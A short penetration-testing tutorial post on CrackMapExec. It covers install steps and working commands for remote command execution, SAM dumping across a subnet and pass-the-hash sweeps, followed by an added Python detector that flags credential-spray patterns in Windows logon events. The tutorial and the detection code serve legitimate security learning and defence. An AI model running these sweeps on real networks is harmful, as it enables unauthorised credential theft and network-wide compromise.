
S1REN

Going down the range.

So let's discuss CrackMapExec (Crack Map Execute) a bit.

The more targeted your username/password or hash list, the more targeted your spray.
This tool is the go-to for internal engagements when performing large sweeps, or 'credential spray' attacks, across a variety of protocols.

I encourage you to do some research on what protocols crackmapexec supports!

+ Here's where you're going to get it:
https://github.com/byt3bl33d3r/CrackMapExec

+ Python Package:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec

+ Install From Source:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec

Examples (recent versions take the protocol as the first argument, so 'smb' is given in each):
--> Execute 'whoami' (-x runs a cmd.exe command):
crackmapexec smb 192.168.1.5 -u Administrator -p 'PASS' -x whoami
--> Query the Administrator account in the domain, using the smbexec execution method:
crackmapexec smb 192.168.1.5 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> Print the PowerShell version table (-X runs a PowerShell command):
crackmapexec smb 192.168.1.5 -u 'Administrator' -p 'PASS' -X '$PSVersionTable'
--> List out machine (local) users:
crackmapexec smb 192.168.1.5 -u 'Administrator' -p 'PASS' --lusers
--> Dump the SAM database across the /24, authenticating as a local account:
crackmapexec smb 192.168.1.0/24 -u 'Administrator' -p 'PASS' --local-auth --sam
--> Let's Pass The Hash against an entire subnet!
crackmapexec smb 192.168.1.0/24 -u 'Administrator' -H 'LM:NTLM' --local-auth
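From the blue-team side, a subnet sweep like the ones above leaves a very recognisable trail: one source address producing network logons (event 4624/4625, logon type 3) against many hosts in a short window. The detector below is an added example, not part of this post or of the CrackMapExec project; the event records are constructed to imitate forwarded Windows Security logs, and the field names are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. 4625 = failed logon, 4624 = successful logon,
# logon type 3 = network (what SMB authentication produces). The
# 192.168.1.77 rows imitate a one-password sweep of a /24; the rest are
# ordinary activity that must not be flagged.
def ev(ts, host, eid, user, src, ltype=3):
    return {"time": datetime.fromisoformat(ts), "host": host, "event_id": eid,
            "logon_type": ltype, "user": user, "src_ip": src}

SAMPLE_EVENTS = [
    ev("2024-05-01T10:00:01", "WS01", 4625, "Administrator", "192.168.1.77"),
    ev("2024-05-01T10:00:02", "WS02", 4625, "Administrator", "192.168.1.77"),
    ev("2024-05-01T10:00:03", "WS03", 4625, "Administrator", "192.168.1.77"),
    ev("2024-05-01T10:00:04", "DC01", 4624, "Administrator", "192.168.1.77"),
    ev("2024-05-01T10:00:05", "WS01", 4624, "jdoe", "192.168.1.20"),
    ev("2024-05-01T10:03:00", "WS01", 4625, "jdoe", "192.168.1.20"),
    ev("2024-05-01T10:09:00", "FS01", 4624, "svc_backup", "10.0.0.5"),
    ev("2024-05-01T10:30:00", "WS02", 4624, "Administrator", "192.168.1.77"),
]

def find_sprays(events, window=timedelta(minutes=5), min_hosts=3):
    """Group network logons by source address and slide a time window over
    each source's events. A source that reaches at least `min_hosts`
    distinct hosts inside one window is reported with the accounts used
    and the failure/success counts for the busiest such window."""
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["event_id"] in (4624, 4625):
            by_src[e["src_ip"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        best, start = None, 0
        for end in range(len(evs)):
            # Advance the window start until the span fits inside `window`.
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            span = evs[start:end + 1]
            hosts = {e["host"] for e in span}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best["hosts"])):
                best = {"hosts": sorted(hosts),
                        "users": sorted({e["user"] for e in span}),
                        "failures": sum(e["event_id"] == 4625 for e in span),
                        "successes": sum(e["event_id"] == 4624 for e in span)}
        if best:
            findings[src] = best
    return findings
```

A single success among many failures from the same source, as in the sample, is the case worth paging on: it means the sprayed credential worked somewhere.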

Don't mind me - just pwning an entire network in one sweep...
CrackMapExec!
